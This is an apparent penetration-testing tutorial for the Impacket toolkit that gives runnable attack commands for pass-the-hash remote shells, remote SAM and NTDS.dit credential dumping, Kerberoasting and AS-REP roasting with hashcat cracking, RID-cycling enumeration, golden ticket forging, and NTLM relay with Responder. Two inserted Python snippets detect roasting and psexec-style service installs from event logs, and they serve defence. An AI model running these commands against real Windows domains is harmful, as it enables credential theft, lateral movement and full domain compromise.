Impacket is a collection of Python classes for working with network protocols, but its real power lies in the suite of attack and post-exploitation scripts that ship with it. From remote code execution to credential dumping and Kerberoasting, Impacket covers a huge portion of a Windows penetration test. This guide walks you through the most important tools in the toolkit and how to use them in authorized lab environments.
Installing Impacket
The cleanest way to install Impacket is via pip inside a virtual environment on Kali Linux or any Debian-based system:
python3 -m venv impacket-env
source impacket-env/bin/activate
pip install impacket
Alternatively, clone the GitHub repo and install from source:
git clone https://github.com/fortra/impacket
cd impacket
pip install .
After installation, the example scripts live in impacket/examples/ and are also accessible directly from your PATH as commands like psexec.py, secretsdump.py, and so on.
psexec.py — Remote Command Execution
psexec.py mimics the Sysinternals PsExec tool, spawning a shell on a remote Windows machine using SMB and a service binary. You need local admin credentials on the target.
psexec.py DOMAIN/Administrator:Password123@192.168.1.10
This drops you into a SYSTEM shell. You can also pass the hash instead of a password using NTLM pass-the-hash:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c Administrator@192.168.1.10
The format for the hash flag is LM:NT. If you only have the NT hash, use a dummy LM hash as shown above.
secretsdump.py — Credential Dumping
secretsdump.py is one of the most powerful tools in Impacket. It can extract NTLM hashes from the SAM database, NTDS.dit (Active Directory database), LSA secrets, and cached credentials — all remotely without dropping a binary on disk.
Dumping the SAM Database
secretsdump.py DOMAIN/Administrator:Password123@192.168.1.10
This outputs local account hashes, cached domain credentials, and LSA secrets.
Dumping NTDS.dit (Domain Controller)
If you have domain admin access, run the same command against a DC to extract every domain account hash:
secretsdump.py DOMAIN/DomainAdmin:Password@192.168.1.1
You’ll receive thousands of NTLM hashes in username:RID:LM:NT::: format, which can be fed directly into Hashcat or John the Ripper.
GetUserSPNs.py — Kerberoasting
Kerberoasting targets service accounts that have Service Principal Names (SPNs) set. Any domain user can request a Kerberos service ticket (TGS) for an SPN — and that ticket is encrypted with the service account’s password hash. Offline cracking then recovers the plaintext.
GetUserSPNs.py DOMAIN/normaluser:password -dc-ip 192.168.1.1 -request
The -request flag automatically requests tickets for all discovered SPNs and outputs them in Hashcat-compatible format ($krb5tgs$23$*...). Crack them with:
hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt
GetNPUsers.py — AS-REP Roasting
AS-REP roasting targets accounts that have Kerberos pre-authentication disabled. Without pre-auth, the KDC responds to AS-REQ without verifying the requester’s identity, leaking an encrypted blob that can be cracked offline.
GetNPUsers.py DOMAIN/ -dc-ip 192.168.1.1 -usersfile users.txt -format hashcat
This is particularly effective after gathering a username list via LDAP enumeration or Kerbrute. The output hashes use Hashcat mode -m 18200.
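On the defensive side, both roasting techniques above leave a trail on the domain controller: Kerberoasting shows up as 4769 (TGS request) events with the RC4 encryption type 0x17 (the etype 23 in $krb5tgs$23$), and AS-REP roasting as 4768 (AS request) events for accounts with pre-authentication type 0. The Python below is an added example, not part of this guide or of Impacket, that runs the two checks over constructed sample records; the EventData field names (TargetUserName, ServiceName, PreAuthType, TicketEncryptionType, IpAddress) and the window and service-count thresholds are assumptions to tune against your own baseline.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23, the $krb5tgs$23$ / $krb5asrep$23$ formats cracked above

# Constructed sample 4769/4768 records (not real telemetry); field names are
# assumed to follow the Windows EventData schema, "t" is epoch seconds.
EVENTS = [
    {"id": 4769, "t": 100, "TargetUserName": "normaluser@DOMAIN.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50"},
    {"id": 4769, "t": 101, "TargetUserName": "normaluser@DOMAIN.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50"},
    {"id": 4769, "t": 102, "TargetUserName": "normaluser@DOMAIN.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50"},
    {"id": 4769, "t": 103, "TargetUserName": "normaluser@DOMAIN.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.50"},
    {"id": 4769, "t": 500, "TargetUserName": "alice@DOMAIN.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.51"},
    {"id": 4768, "t": 600, "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.50"},
    {"id": 4768, "t": 601, "TargetUserName": "bob", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.52"},
]


def detect_roasting(events, window=300, min_services=3):
    """Return (kind, user, ip[, services]) alerts for the two roasting patterns.

    Kerberoast: one requester obtains RC4 TGS tickets for >= min_services distinct
    user-account services within `window` seconds (GetUserSPNs -request asks for
    every SPN in one go). AS-REP roast: a 4768 with PreAuthType 0 and an RC4 etype.
    """
    alerts = []
    tgs = defaultdict(list)  # (requester, source ip) -> [(t, service)]
    for e in events:
        if e["id"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC:
            svc = e["ServiceName"]
            if svc.endswith("$") or svc.lower() == "krbtgt":
                continue  # machine accounts and the TGT itself are not roastable
            tgs[(e["TargetUserName"], e["IpAddress"])].append((e["t"], svc))
        elif e["id"] == 4768 and e["PreAuthType"] == "0" and e["TicketEncryptionType"] == RC4_HMAC:
            alerts.append(("asrep_roast", e["TargetUserName"], e["IpAddress"]))
    for (user, ip), reqs in tgs.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window over this requester's requests
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts.append(("kerberoast", user, ip, sorted(services)))
                break
    return alerts
```

The RC4 filter is what keeps this rule cheap on a high-volume 4769 stream; once service accounts are AES-only, any RC4 TGS request is itself the anomaly.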
wmiexec.py — Fileless Remote Execution
Unlike psexec.py, wmiexec.py uses Windows Management Instrumentation (WMI) for remote code execution and doesn’t write a service binary to disk, making it stealthier:
wmiexec.py DOMAIN/Administrator:Password@192.168.1.10
Output is returned semi-interactively. This is often preferred on engagements where AV/EDR is active because no persistent service is created.
smbclient.py — SMB Share Browsing
smbclient.py provides an FTP-like interface for browsing SMB shares:
smbclient.py DOMAIN/user:password@192.168.1.10
Inside the prompt, shares lists the available shares, use SHARE selects one, and ls lists its contents. Great for quickly grabbing files of interest without mounting shares.
lookupsid.py — RID Cycling for User Enumeration
RID cycling can enumerate domain users without authentication if null sessions are allowed:
lookupsid.py DOMAIN/guest:@192.168.1.1 20000
This enumerates SIDs up to RID 20000, which is usually sufficient to get all user and group accounts. Useful for building a target username list for Kerberoasting or password spraying.
ticketer.py — Golden and Silver Tickets
Once you have the KRBTGT hash (from secretsdump.py on a DC), you can forge Golden Tickets:
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-... -domain DOMAIN Administrator
This creates a .ccache Kerberos ticket file. Export it for use:
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass DOMAIN/Administrator@dc01.domain.local
Golden Tickets are valid for 10 years by default and persist even after password changes, as long as the KRBTGT hash isn’t rotated twice.
ntlmrelayx.py — NTLM Relay Attacks
ntlmrelayx.py relays captured NTLM authentication to other targets. Combined with Responder (to capture hashes), this is a classic attack chain:
# In one terminal (disable SMB/HTTP in Responder.conf first):
responder -I eth0 -rdw
# In another terminal:
ntlmrelayx.py -tf targets.txt -smb2support
When a victim authenticates to the attacker (triggered by Responder), ntlmrelayx relays those credentials to targets in targets.txt, potentially executing commands or dumping SAM databases.
Best Practices
Always operate within authorized scope and document every command run during an engagement. Impacket leaves artifacts in Windows event logs — particularly Event IDs 4624, 4648, 7045, and 4776 — so blue teams will detect heavy usage. Use tools selectively and understand what each command does before running it. In a real engagement, combine Impacket findings with BloodHound path analysis to identify the most efficient attack chains to domain compromise.
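To make the event IDs above concrete, here is an added Python example (not part of this guide or of Impacket) that correlates 7045 service-install events with the most recent network logon (4624, LogonType 3) on the same host, over constructed sample records. The field names, the Computer attribute, and the naming heuristic for psexec.py-style services (short letters-only service name, random executable in the Windows directory) are assumptions, not documented Impacket behaviour, so tune them against your own telemetry.

```python
import re

# Constructed sample records (not real telemetry): System-log 7045 service
# installs and Security-log 4624 network logons, reduced to assumed EventData
# field names plus a "Computer" host attribute. "t" is epoch seconds.
EVENTS = [
    {"id": 4624, "t": 10, "LogonType": "3", "TargetUserName": "Administrator",
     "IpAddress": "192.168.1.50", "Computer": "WS01"},
    {"id": 7045, "t": 12, "ServiceName": "kQmZ", "ImagePath": "%systemroot%\\jHdGkwPa.exe",
     "StartType": "demand start", "Computer": "WS01"},
    {"id": 7045, "t": 900, "ServiceName": "BackupAgent",
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe", "StartType": "auto start", "Computer": "WS01"},
    {"id": 4624, "t": 1000, "LogonType": "3", "TargetUserName": "svc_scan",
     "IpAddress": "192.168.1.60", "Computer": "WS02"},
]

# Heuristic (an assumption, not Impacket's documented behaviour): a short
# letters-only service name whose binary sits directly in the Windows directory
# under a random name. Legitimate installers rarely look like this.
RANDOM_SVC = re.compile(r"^[A-Za-z]{4,8}$")
RANDOM_BIN = re.compile(r"^(%systemroot%|[A-Za-z]:\\Windows)\\[A-Za-z]{8}\.exe$", re.I)


def detect_remote_service_exec(events, window=60):
    """Flag suspicious 7045 installs and attribute each to the latest network
    logon on that host within `window` seconds (None if no logon is found)."""
    logons = [e for e in events if e["id"] == 4624 and e["LogonType"] == "3"]
    alerts = []
    for e in events:
        if e["id"] != 7045:
            continue
        if not (RANDOM_SVC.match(e["ServiceName"]) and RANDOM_BIN.match(e["ImagePath"])):
            continue
        # candidate source logons: same host, shortly before the service install
        src = [l for l in logons if l["Computer"] == e["Computer"] and 0 <= e["t"] - l["t"] <= window]
        src.sort(key=lambda l: l["t"])
        origin = (src[-1]["TargetUserName"], src[-1]["IpAddress"]) if src else None
        alerts.append({"host": e["Computer"], "service": e["ServiceName"],
                       "image": e["ImagePath"], "origin": origin})
    return alerts
```

Because 7045 is rare on a stable host, the service-install event alone is worth alerting on; the 4624 pairing mainly tells the responder which account and source address to pivot on.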
Impacket is pre-installed on Kali Linux and Parrot OS, and it’s worth keeping it updated via pip or the GitHub repository since new features and bug fixes are released regularly.